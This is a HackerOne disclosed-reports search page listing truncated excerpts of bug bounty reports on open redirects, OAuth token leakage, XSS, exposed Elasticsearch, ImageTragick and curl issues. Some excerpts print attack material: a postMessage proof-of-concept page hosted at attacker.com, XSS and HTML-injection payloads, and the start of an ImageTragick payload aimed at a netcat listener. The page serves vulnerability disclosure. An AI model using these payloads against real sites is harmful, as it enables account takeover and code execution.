
HackerOne Reports

Search through disclosed security reports

10,350 reports found
Showing 1041 - 1060
We were able to bypass the mechanism that prevents open redirects due to incomplete URL input validation. I have reported it below and written a patch to fix it. https://hackerone.com/reports/1789458 ## Impact Vulnerable code will look like this: ```ruby redirect_to(params[:some_param]) ``` Rails 7.0 introduced protection against open redirects from calling …
Hello Team, I found a security issue in the Reverb iOS application which allows an attacker to hack all users' accounts. Since the iOS application is not in scope I am still reporting this, because this vulnerability may compromise all users' accounts. Please resolve this quickly. Description: The Reverb iOS application is …
Domain, site, application --- oauth.semrush.com Steps to reproduce --- 1) Create following html at attacker.com/postmessage.html ``` <script> function listener(event) { alert(JSON.stringify(event.data)); } var dest = window.open("https://oauth.semrush.com/oauth2/authorize?response_type=code&scope=user.info,projects.info,siteaudit.info&client_id=seoquake&redirect_uri=https%3A%2F%2Foauth.semrush.com%2Foauth2%2Fsuccess&state=636e7bae-22ed-407d-8d62-1d49b49ec962"); window.addEventListener("message", listener); </script> ``` 2) Go to attacker.com/postmessage.html (make sure you are logged in at www.semrush.com) 3) Click "Approve" 4) Go to tab with …
**Description:** The vulnerability lies in insecure access to an Elasticsearch instance accessible at the URL "https://███████l". Currently, access to Elasticsearch is open without the need for authentication, exposing data stored on this instance to the risk of unauthorized disclosure. ## References https://www.acunetix.com/vulnerabilities/web/elasticsearch-service-accessible/ https://medium.com/@D0rkerDevil/3k-bounty-for-elastic-search-takeover-70c0847d2e40 https://infosecwriteups.com/haystack-hackthebox-writeup-7dfd8a6fed5 https://book.hacktricks.xyz/network-services-pentesting/9200-pentesting-elasticsearch ## Impact Insecure access to …
#Introduction In the Zomato Business app there is the functionality to report a review and give additional details as to why you did report the review. Because I knew this reason would be read by Zomato admins I did insert a blind XSS payload here, which ended up executing on …
I made a report at https://hackerone.com/reports/1187477 https://www.ruby-lang.org/en/news/2024/03/21/rce-rdoc-cve-2024-27281/ > An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby 3.x through 3.3.0. > When parsing .rdoc_options (used for configuration in RDoc) as a YAML file, object injection and resultant remote code execution are possible because there are no …
**Summary:** Stored XSS exists at https://www.██████.mil. A user can fill out the form and upload a file containing javascript code to trigger XSS. **Description:** Stored XSS exists at https://www.████.mil. A user can fill out the form and upload a file containing javascript code to trigger XSS. ## Impact A user …
**Issue description** We found that the maximum length of the first and last name fields was not set to 32 characters at registration and to 1000 characters when using the profile update form. The attacker can use this method as a malware attack; the user will be redirected to a website …
lmhu
Hi, ### Background kitcrm.com allows the administrator to upload priority product images located at: https://kitcrm.com/seller/onboarding/1 {F359446} {F359447} These images are not checked to verify that they are real JPG/PNG/GIF files. When uploading an ImageTragick payload (issue found by Tavis Ormandy) using the following payload (my netcat listener is on `██████████:8080`): ``` %!PS userdict …
You can post JavaScript code in form fields ## Summary [add summary of the vulnerability] ## Steps To Reproduce [add details for how we can reproduce the issue] Steps: 1. Go to the vulnerable link: https://www.acronis.cz/dotaznik/roadshow-2020/ 2. Enter this JavaScript code "><script>alert(1);</script> in a form field 1. [add step] 1. [add …
Hello, I have found HTML injection on ██████.informatica.com. Injectable parameter: search.html?q=1 URL: https://████████.informatica.com/search.html?q=1%22%3E%3Cimg%20src=https://www.no-gods-no-masters.com/images_designs/anonymous-gandhi-d001001207265.png%3E%E2%80%[email protected]%20%22 Payload: 1"><img src=https://www.no-gods-no-masters.com/images_designs/anonymous-gandhi-d001001207265.png>”@x.y " https://█████.informatica.com/search.html?q=1%3Ca%20href=%22//bf.am%22%3EWelcome%3C/a%3E Payload: <a href="//bf.am">Welcome</a> ## Impact Phishing, abusing other users, defacing
I'm Zehui Miao from NISL@THU. During recent research, our team identified a parsing inconsistency in curl. ### **0x01 Affected components** #### **1.1 Affected components** • **C Curl** • **Versions:** tested in 8.4.0 • **CLAIMS TO FOLLOW: RFC-3986** #### **1.2 Attack scenario** The threat model illustrated in Figure 1 explains …
## Summary: When the curl command is used with `--continue-at`, `--no-clobber` is unexpectedly ignored and curl will append the output to the target file, even if it already exists. If `--continue-at` is used with `--remove-on-error` it can lead to unexpected removal of the file on early errors. Note that this also …
## Summary: The vulnerability is located in the `/include/findusers.php` script: ``` 16. include "../mainfile.php"; 17. xoops_header(false); 18. 19. $denied = true; 20. if (!empty($_REQUEST['token'])) { 21. if (icms::$security->validateToken($_REQUEST['token'], false)) { 22. $denied = false; 23. } 24. } elseif (is_object(icms::$user) && icms::$user->isAdmin()) { 25. $denied = false; 26. } 27. …
egix
## Summary: The vulnerability is located in the `/libraries/image-editor/image-edit.php` script: ``` 161. if (@copy ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp, $categ_path . $simage->getVar ( 'image_name' ) )) { 162. if (@unlink ( ICMS_IMANAGER_FOLDER_PATH . '/temp/' . $simage_temp )) { 163. $msg = _MD_AM_DBUPDATED; [...] 190. } else { 191. if …
egix
This bug was reported directly to GitHub Security Lab.
Hi Team, **Summary:** There is a newly disclosed resolved report [Program Email Nofication settings ignored when being added as an external contributor](https://hackerone.com/reports/645264); however, I found that the fix is incomplete. I have found that the email invitation for a collaborator (bounty splitting) still discloses the __Report title__ in the email when the notification …
japz